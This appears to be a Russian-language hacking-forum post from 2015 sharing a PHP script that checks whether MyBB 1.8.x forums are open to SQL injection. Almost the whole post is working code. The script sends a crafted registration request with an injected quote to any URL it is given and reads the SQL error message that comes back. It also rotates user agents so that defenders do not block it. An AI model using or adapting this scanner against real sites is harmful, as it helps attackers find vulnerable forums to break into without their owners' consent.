MyBB 1.8.X SQLi Checker

Тема в разделе MyBB, создана пользователем ERROR404, 31 окт 2015.

Войдите для ответа
  1. ERROR404 Администратор

    ERROR404
    Статус:
    Вне сети
    <?php
    if ( isset( $_GET[ 'q' ] ) )
    {
      $host = $_GET[ 'q' ];
      
      //Making sure http or https is set
      if ( substr( $host, 0, 4 ) == "http" )
      {
        $protocol = "http";
        if ( substr( $host, 0, 5 ) == "https" )
        {
          $protocol = "https";
        }
        
        //Removing trailing slashes
        if ( substr( $host, -1 ) == '/' )
        {
          $host = substr( $host, 0, -1 );
        }
        
        //Initial SQL Injection check
        $newHost  = $host . '/member.php';
        $data     = "regcheck1=&regcheck2=true&username=makman&password=mukarram&password2=mukarram&email=mak@live.com&email2=mak@live.com&referrername=&imagestring=F7yR4&imagehash=1c1d0e6eae9c113f4ff65339e4b3079c&answer=4&allownotices=1&receivepms=1&pmnotice=1&subscriptionmethod=0&timezoneoffset=0&dstcorrection=2&regtime=1416039333&step=registration&action=do_register&regsubmit=Submit+Registration!&question_id='";
        $response = SendPost( $newHost, $data );
        if ( strpos( $response, "You have an error in your SQL syntax" ) !== false )
        {
          printf( "%s is vulnerable to MyBB 1.8.X SQL Injection!", $host );
        }
        else
        {
          printf( "%s is not vulnerable to MyBB 1.8.X SQL Injection!", $host );
        }
      }
      else
      {
        echo "Invalid host, needs to have a protocol -> http://apples.org/path/to/forums";
      }
    }
    else
    {
      echo "Invalid parameters, are you drunk?";
    }
    
    //Dont get useragent blocked
    function getRandomUserAgent()
    {
      $userAgents = array(
         "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6",
        "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)",
        "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)",
        "Opera/9.20 (Windows NT 6.0; U; en)",
        "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50",
        "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.02 [en]",
        "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; fr; rv:1.7) Gecko/20040624 Firefox/0.9",
        "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/48 (like Gecko) Safari/48" 
      );
      $random     = rand( 0, count( $userAgents ) - 1 );
      return $userAgents[ $random ];
    }
    
    //Send a post request
    function SendPost( $site, $post )
    {
      $ch = curl_init();
      curl_setopt( $ch, CURLOPT_URL, "$site" );
      curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true );
      curl_setopt( $ch, CURLOPT_USERAGENT, getRandomUserAgent() );
      curl_setopt( $ch, CURLOPT_POSTFIELDS, $post );
      $response = curl_exec( $ch );
      curl_close( $ch );
      return $response;
    }
    ?>
     
    31 окт 2015 #1
Top